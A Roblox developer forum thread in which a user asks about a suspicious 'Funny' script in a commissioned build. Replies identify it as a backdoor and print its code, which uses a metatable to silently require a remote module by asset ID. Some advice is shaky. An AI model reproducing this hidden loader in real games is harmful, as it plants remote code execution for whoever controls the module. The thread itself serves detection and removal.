Hello, I recently commissioned a build and wanted to know what this “Funny” script was. Could someone explain? (no free models used)
builder’s claim:
also, does anyone know if this is malicious?
Hello, I recently commissioned a build and wanted to know what this “Funny” script was. Could someone explain? (no free models used)
builder’s claim:
also, does anyone know if this is malicious?
Probably a virus delete it probably if it’s a free model
no free models used, they claimed.
I’ve know that every script inside a model is a virus except the one’s I scripted try playing it on a test game to see if it’s a virus
Try getting the module on the roblox website ok?
The script is trying to require a ModuleScript by its ID. It’s probably malicious if the person you commissioned never told you about the script beforehand.
The best answer is just delete the script because it is malicious the script that is requiring the module I guess
It’s a backdoor most likely. That script imports something in the game.
That is a yes it’s spamming the water terrain you would not like that right?
Ok so I spent the last 30 minutes trying to reverse engineer this animation/smooth model bypass.
There’s an exploit where you can upload scripts masking them as smooth models, animations etc.
At the end of the loop, I found a script that just teleports your to another game, please rmeove the script.
I took a look at the model ArtFoundation shown, and i found this:
local Funny = {
"yo",
require,
"poop",
"i am so random!!",
getfenv,
"yea",
"tm"
}
function l(x)
if x == "Funny" then
print''
spawn(function()
pcall(function()
require(4178953416)
end)
end)
end
end
local Funny = setmetatable({}, {
__index = function(t, k)
l(k)
end
})
return Funny
I got the code from the one, if not, best extension ever made for Roblox.
Its clearly malicious, because i found an getfenv.
Thanks, are scripts the only objects that can contain malicious things?
getfenv
on it’s own is not malicious, it’s actually really useful for sandboxing code, but yes, randomly calling an API without you knowing, it’s probably malicious code
Yesjust some 30 char don’t mind
No, Plugins Can too. Make sure you have plugins from trusted users.
Also, if you don’t mind checking, is the second script safe?
I don’t think it’s malicious per se–it doesn’t try to reference a third party source (like the other did), but what it does is replace any Texture object it finds in your model with a water texture. You can remove it if that’s not what you want.
Thank you! This was very useful!